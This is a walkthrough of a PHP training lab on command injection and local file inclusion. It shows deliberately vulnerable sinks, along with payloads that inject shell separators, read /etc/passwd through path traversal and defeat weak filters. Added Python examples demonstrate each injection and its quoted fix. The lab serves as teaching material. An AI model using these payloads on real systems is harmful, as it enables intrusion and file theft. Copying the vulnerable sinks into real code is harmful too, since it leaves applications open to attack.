Paralax LFI Lab

This lab teaches Command Injection and Local File Inclusion. The author collected several variants of each vulnerability, from a bare sink up to filtered ones.

Github Project

Download or clone the following repository:

https://github.com/paralax/lfi-labs

CMD -1

Source Code

<?php
    system($_GET["cmd"]);
?>

Small Explanation

system() -> executes the string as a shell command and prints its output
$_GET['cmd'] -> user input taken from the GET query string -> file.php?cmd=<user_input>

Exploiting

?cmd=whoami  ( "whoami" exists on both Windows and Linux )

POC

CMD -2

Source Code

<?php
    system($_POST["cmd"]);
?>

Small Explanation

system() -> executes the string as a shell command and prints its output
$_POST['cmd'] -> the same input, but read from the POST body instead of the query string

Exploiting

Send cmd=whoami in the request body instead of the query string, e.g. curl -d 'cmd=whoami' <URL of CMD-2>.

POC

 

CMD-3

Source Code

<?php
    system("/usr/bin/whois " . $_GET["domain"]);
?>

If you are running the lab on Windows, change "/usr/bin/whois" to "nslookup" (the output below is from nslookup).

Small Explanation

With ?domain=google.com the script runs -> nslookup google.com
Result ->
Server:  UnKnown
Address:  192.168.43.1

Name:    google.com
Addresses:  2404:6800:4001:806::200e
	  216.58.196.14

The domain is concatenated into the command line unquoted, so we need to break out of the nslookup command. The OWASP Testing Guide lists these shell separators and substitutions:

cmd1|cmd2  : cmd2 runs whether cmd1 succeeded or not, with cmd1's output piped into its stdin.
cmd1;cmd2  : cmd2 runs whether cmd1 succeeded or not.
cmd1||cmd2 : cmd2 runs only if cmd1 fails (non-zero exit status).
cmd1&&cmd2 : cmd2 runs only if cmd1 succeeds.
$(cmd)     : command substitution, e.g. echo $(whoami) or $(touch test.sh; echo 'ls' > test.sh)
`cmd`      : the older form of command substitution, e.g. `whoami`
<(cmd)     : bash process substitution, e.g. cat <(ls)
>(cmd)     : the output-side form of process substitution, e.g. ls > >(cat)

Process substitution needs bash rather than plain sh. On Windows, cmd.exe understands &, && , || and | but not ;, $(...) or backticks; there the plain separator is &.
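To see what each separator does to the CMD-3 sink without a whois server, the following Python model is added here as an example (it is not part of the lab). echo stands in for whois so it runs offline; the raw concatenation and the sh -c call have the same shape as PHP's system(), and the hardened version quotes the value the way escapeshellarg() does. The payloads are constructed for this example, and /bin/sh is assumed.

```python
import shlex
import subprocess

MARK = "INJECTED"


def run_sh(cmd: str) -> str:
    """Run a command line through /bin/sh, which is what PHP's system() does."""
    return subprocess.run(["sh", "-c", cmd], capture_output=True, text=True).stdout


def vulnerable_lookup(domain: str) -> str:
    # Mirrors system("/usr/bin/whois " . $_GET["domain"]): unquoted concatenation.
    # echo replaces whois so the example needs no network.
    return run_sh("echo " + domain)


def hardened_lookup(domain: str) -> str:
    # shlex.quote() does what PHP's escapeshellarg() does: it single-quotes the
    # value so the shell passes it through as one literal argument.
    return run_sh("echo " + shlex.quote(domain))


# Constructed payloads, one per separator from the list above. The injected
# command is `printf IN%sED JECT`, which prints INJECTED only when the shell
# actually executes it; if it is merely echoed back, the output holds "IN%sED".
PAYLOADS = {
    "cmd1;cmd2":  "google.com; printf IN%sED JECT",
    "cmd1|cmd2":  "google.com | printf IN%sED JECT",
    "cmd1&&cmd2": "google.com && printf IN%sED JECT",
    "cmd1||cmd2": "google.com || printf IN%sED JECT",   # echo succeeds, so this never fires
    "$(cmd)":     "google.com $(printf IN%sED JECT)",
    "`cmd`":      "google.com `printf IN%sED JECT`",
}


def fired(output: str) -> bool:
    """True when the injected command ran rather than being echoed as text."""
    return MARK in output


def demonstrate() -> dict:
    """Map each separator to (fired_in_vulnerable_sink, fired_in_hardened_sink)."""
    return {name: (fired(vulnerable_lookup(p)), fired(hardened_lookup(p)))
            for name, p in PAYLOADS.items()}


if __name__ == "__main__":
    for name, (vuln, hard) in demonstrate().items():
        print(f"{name:11s} vulnerable={str(vuln):5s} hardened={hard}")
```

The || case stays silent only because echo exits 0; in the lab it fires whenever whois itself fails, which is exactly what the CMD-5 payload below relies on.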

POC

CMD-4

Source Code

<?php
    system("whois " . $_POST["domain"]);
 ?>

Small Explanation

The only change from CMD-3 is that the domain is read from POST instead of GET.

POC

 

CMD-5

Source Code

<?php
if (preg_match('/^[-a-z0-9]+\.a[cdefgilmnoqrstuwxz]|b[abdefghijmnorstvwyz]|c[acdfghiklmnoruvxyz]|d[ejkmoz]|e[cegrstu]|f[ijkmor]|g[abdefghilmnpqrstuwy]|h[kmnrtu]|i[delmnoqrst]|j[emop]|k[eghimnprwyz]|l[abcikrstuvy]|m[acdeghklmnopqrstuvwxyz]|n[acefgilopruz]|om|p[aefghklmnrstwy]|qa|r[eosuw]|s[abcdeghijklmnortuvyz]|t[cdfghjklmnoprtvwz]|u[agksyz]|v[aceginu]|w[fs]|y[et]|z[amw]|biz|cat|com|edu|gov|int|mil|net|org|pro|tel|aero|arpa|asia|coop|info|jobs|mobi|name|museum|travel|arpa|xn--[a-z0-9]+$/', strtolower($_GET["domain"])))
    { system("whois -h " . $_GET["server"] . " " . $_GET["domain"]); }
else
    { echo "malformed domain name"; }
?>

Small Explanation

$_GET['domain'] is checked against a regex (but see the caveat below)
$_GET['server'] is a second input that goes into the command unchecked
We need to look at every input, including ones that have no visible form field.

Caveat: the regex is weaker than it looks. The ^ anchor belongs only to the first alternative and the $ only to the last, and preg_match() matches anywhere in the string, so any domain that merely contains a two-letter branch such as "id" or a word such as "com" passes (e.g. domain=com;whoami). Wrapping the whole alternation in (?:...) would bind both anchors to every branch.

Escaping

Command -> whois -h [server] [domain]

Input ->        ?domain=facebook.com&server=127.0.0.1

Command -> whois -h 127.0.0.1 facebook.com

Escaping -> ?domain=facebook.com&server=127.0.0.1|whoami||

Command -> whois -h 127.0.0.1|whoami|| facebook.com

| -> whoami runs regardless of whois (the whois output is piped into it and ignored)
|| -> the trailing " facebook.com" becomes a command that runs only if whoami fails, so it no longer breaks the injected command
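The regex caveat above is easy to check by hand. The following Python is an added example, not lab code: it rebuilds the lab's pattern from its alternation exactly as written in CMD-5, compares it with a version whose anchors cover every branch, and shows that the server parameter needs its own validation and quoting either way. The server allowlist regex and the use of shlex.quote() (the shell-quoting equivalent of escapeshellarg()) are this example's choices, not the lab's.

```python
import re
import shlex

# The alternation copied from the lab's CMD-5 source. The lab's full pattern is
# '^[-a-z0-9]+\.' + this + '$', so ^ binds only to the first branch and $ only
# to the last one.
TLDS = (
    "a[cdefgilmnoqrstuwxz]|b[abdefghijmnorstvwyz]|c[acdfghiklmnoruvxyz]|d[ejkmoz]|"
    "e[cegrstu]|f[ijkmor]|g[abdefghilmnpqrstuwy]|h[kmnrtu]|i[delmnoqrst]|j[emop]|"
    "k[eghimnprwyz]|l[abcikrstuvy]|m[acdeghklmnopqrstuvwxyz]|n[acefgilopruz]|om|"
    "p[aefghklmnrstwy]|qa|r[eosuw]|s[abcdeghijklmnortuvyz]|t[cdfghjklmnoprtvwz]|"
    "u[agksyz]|v[aceginu]|w[fs]|y[et]|z[amw]|biz|cat|com|edu|gov|int|mil|net|org|"
    "pro|tel|aero|arpa|asia|coop|info|jobs|mobi|name|museum|travel|arpa|xn--[a-z0-9]+"
)
LAB_PATTERN = re.compile(r"^[-a-z0-9]+\." + TLDS + r"$")        # as in the lab
FIXED_PATTERN = re.compile(r"^[-a-z0-9]+\.(?:" + TLDS + r")$")   # anchors cover every branch

# Separate allowlist for the server parameter (an example choice; the lab has none).
SERVER_RE = re.compile(r"^[a-z0-9.-]+$", re.IGNORECASE)


def lab_check(domain: str) -> bool:
    # preg_match() searches, it does not anchor; strtolower() as in the lab.
    return LAB_PATTERN.search(domain.lower()) is not None


def fixed_check(domain: str) -> bool:
    return FIXED_PATTERN.search(domain.lower()) is not None


def lab_command(server: str, domain: str):
    """The string CMD-5 hands to system(), or None when the regex rejects the domain."""
    if not lab_check(domain):
        return None
    return "whois -h " + server + " " + domain


def fixed_command(server: str, domain: str):
    """Hardened form: both inputs validated, both shell-quoted."""
    if not fixed_check(domain) or SERVER_RE.search(server) is None:
        return None
    return "whois -h " + shlex.quote(server) + " " + shlex.quote(domain)


if __name__ == "__main__":
    for d in ("facebook.com", "x;id", "com;whoami", "!!!"):
        print(f"{d!r:14s} lab={lab_check(d)!s:5s} fixed={fixed_check(d)}")
    print(lab_command("127.0.0.1|whoami||", "facebook.com"))
    print(fixed_command("127.0.0.1|whoami||", "facebook.com"))
```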

POC

CMD-6

The only change from CMD-5 is that both inputs are read from POST instead of GET.

 

LFI-1

Source Code

<?php
include($_GET["page"]);
?>

Small Explanation

include() -> reads the file at the given path and executes any PHP in it; non-PHP content is output as-is, which is why /etc/passwd is simply displayed
$_GET['page'] -> user input taken from the GET query string, with no prefix or suffix, so absolute paths are accepted

Exploitation

?page=C:/Windows/system.ini ( Windows )
?page=/etc/passwd ( Linux )

POC

LFI-2

Source Code

<?php
include("includes/".$_GET['library'].".php"); 
?>

Small Explanation

prefix -> includes/ and suffix -> .php are wrapped around our input
Directory traversal -> cd .. -> ../ walks back out of includes/
Null byte injection -> %00 -> terminates the string for the underlying C call, so the appended .php is dropped

Exploitation

library=../readme.md%00   -> includes/../readme.md

Null-byte truncation was fixed in PHP 5.3.4, so this only works on older PHP.

Without a null byte we can still include any .php file by letting the suffix be appended for us:

library=../../../info   -> includes/../../../info.php

Remote File Inclusion through include() additionally needs allow_url_include=On (which itself requires allow_url_fopen=On); allow_url_include is Off by default.

POC

LFI-3

Source Code

<?php
if (substr($_GET['file'], -4, 4) != '.php')
 echo file_get_contents($_GET['file']);
else
 echo 'You are not allowed to see source files!'."\n";
?>

Small Explanation

The check rejects only names whose last four characters are ".php", so source files cannot be requested by their real name. On Windows, the file APIs PHP uses treat "<" in a path as a wildcard (like "*"), so ?file=index.ph< passes the check but still opens index.php. Note that this lab uses file_get_contents(), so the file is returned verbatim rather than executed.

POC

LFI-4

Source Code

<?php
include('includes/class_'.addslashes($_GET['class']).'.php');
?>

Small Explanation

includes/class_<input>.php

addslashes() escapes quotes, backslashes and NUL (a %00 becomes \0, so null-byte truncation is gone), but it does nothing to "/" or "..", so traversal still works and the forced .php suffix means only PHP files are reachable:

?class=aaa/../../../../info   -> includes/class_aaa/../../../../info.php

POC

LFI-5

Source Code

<?php
   $file = str_replace('../', '', $_GET['file']);
   if(isset($file))
   {
       include("pages/$file");
   }
   else
   {
       include("index.php");
   }
?>

Small Explanation

str_replace() removes "../" in a single pass and is not repeated, so input that only turns into "../" after one removal slips through.
Obfuscated input -> ..././ -> ../ (the inner "../" is removed and the remaining characters join up)

POC

LFI-6 to LFI-10

These repeat LFI-1 to LFI-5; the only difference is the request method (GET versus POST).

 

LFI-11

Source Code

<form action="/LFI-11/index.php" method="POST">
    <input type="text" name="file">
    <input type="hidden" name="style" name="stylepath">
</form>

<?php include($_POST['stylepath']); ?>

Small Explanation

The form only shows a "file" field, but the PHP reads $_POST['stylepath']. (The hidden input even carries two name attributes; a browser keeps the first, "style", so the form never sends stylepath at all.) Always test hidden and unreferenced parameters.
stylepath=C:/Windows/system.ini

POC

LFI-12

Same as LFI-11 with GET instead of POST.

POC

LFI-13

Same filter as LFI-5, so the same bypass works:
file=..././..././..././info.php

POC

LFI-14

Same as LFI-13 with GET instead of POST.